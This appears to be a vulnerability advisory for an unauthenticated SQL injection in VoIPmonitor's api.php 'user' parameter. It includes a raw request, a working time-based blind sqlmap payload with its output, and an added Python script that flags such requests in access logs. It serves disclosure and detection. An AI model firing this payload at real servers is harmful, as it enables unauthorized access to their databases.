SQL injection in the user parameter of api.php. Because api.php does not require any authentication, an attacker can exploit this vulnerability without a valid session or credentials.
GET /voipmonitorpath/api.php?action=login&user=[inject_here]&pass=trollz HTTP/1.1
Host: vulnerableinstance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: close
sqlmap result:
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://vulnerableinstance:80/voipmonitorpath/api.php?action=login&user=' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))Evax) AND 'jvDj'='jvDj&pass=trollz
---
[02:19:33] [INFO] testing MySQL
[02:20:22] [INFO] confirming MySQL
web application technology: Nginx 1.14.2, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.3.29-MariaDB-1:10.3.29+maria~stretch'
cc: @cnbrkbolat & @R0h1rr1m
Website of the product:
https://www.voipmonitor.org/
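
Added example (not part of the original advisory and not the vendor's code): a Python check that scans web server access-log lines for api.php login requests whose decoded user value falls outside a username allow-list, which flags the sqlmap payload shown above. The log lines are constructed; the nginx "combined" log format and the allow-list pattern are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in nginx "combined" format (assumed); IPs are documentation ranges.
SAMPLE_LOG = """
198.51.100.7 - - [01/Jan/2021:02:19:33 +0000] "GET /voipmonitorpath/api.php?action=login&user=%27%20AND%20%28SELECT%209158%20FROM%20%28SELECT%28SLEEP%285%29%29%29Evax%29%20AND%20%27jvDj%27%3D%27jvDj&pass=trollz HTTP/1.1" 200 0 "-" "-"
203.0.113.5 - - [01/Jan/2021:02:20:01 +0000] "GET /voipmonitorpath/api.php?action=login&user=alice&pass=x HTTP/1.1" 200 12 "-" "-"
203.0.113.6 - - [01/Jan/2021:02:20:05 +0000] "GET /voipmonitorpath/api.php?action=login&user=bob%40example.com&pass=x HTTP/1.1" 200 12 "-" "-"
203.0.113.5 - - [01/Jan/2021:02:20:09 +0000] "GET /voipmonitorpath/index.php?user=o%27brien HTTP/1.1" 200 512 "-" "-"
"""

# Client IP and request target from a combined-format line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')
# Assumption: legitimate login names use only these characters.
VALID_USER = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def suspicious_logins(log_text):
    """Return (client_ip, decoded_user) for api.php login requests
    whose user value does not look like a login name."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # blank or unparseable line
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/api.php"):
            continue  # only the unauthenticated endpoint is of interest
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        if params.get("action") != ["login"]:
            continue
        for user in params.get("user", []):
            if not VALID_USER.fullmatch(user):
                hits.append((ip, user))
    return hits


if __name__ == "__main__":
    for ip, user in suspicious_logins(SAMPLE_LOG):
        print(f"{ip} sent unexpected user value: {user!r}")
```

An allow-list on the decoded value is used here instead of keyword matching, so the check does not depend on which SQL functions a payload contains.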